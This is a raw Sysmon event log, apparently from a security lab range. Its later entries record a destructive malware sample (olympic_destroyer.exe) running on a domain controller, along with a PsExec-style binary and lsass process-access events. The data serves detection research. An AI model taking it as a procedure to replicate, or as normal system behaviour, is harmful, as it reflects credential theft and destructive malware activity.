11:06:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219573Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219572Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219571Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219570Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219569Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219568Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219567Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219566Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.194{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000219565Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.194{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1545-6216-CA04-000000003902}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000219564Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.194{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1545-6216-CA04-000000003902}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219563Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:45.195{4F8D34B0-1545-6216-CA04-000000003902}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000219579Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:46.991{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB2BB40ED88F9852B89132C012FD6183,SHA256=66F47158289CF6A60D8E336DAEFB871756AB65D106723E577F76F1B2AFDAF67F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.600{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39203871078D918DCF9FED3F03391B45,SHA256=CFFC333850155E6297DA5671B42A2BB11AA70BD90CC4B81EFA4BF820E596DB9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219578Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:46.350{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219577Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:06:46.225{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85BAE8E1086B6367FA1289243D2EBA0C,SHA256=2133FF12C30C47BC01DEB35D17427ED8CF3609639D9246D3B36F30CEF07A4989,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.437{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1546-6216-C306-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.437{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-1546-6216-C306-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000295474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:06:46.399{C8EA50B7-1546-6216-C306-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000295473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.299{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-1546-6216-C406-000000003802}5620C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.299{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1546-6216-C406-000000003802}5620C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.252{C8EA50B7-1546-6216-C406-000000003802}56207140C:\Windows\system32\conhost.exe{C8EA50B7-1546-6216-C306-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.183{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1546-6216-C406-000000003802}5620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.168{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1546-6216-C406-000000003802}5620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.037{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-1546-6216-C306-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.037{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.037{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.037{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.037{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.037{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-1546-6216-C306-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000295462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:06:46.035{C8EA50B7-1546-6216-C306-000000003802}5708C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute 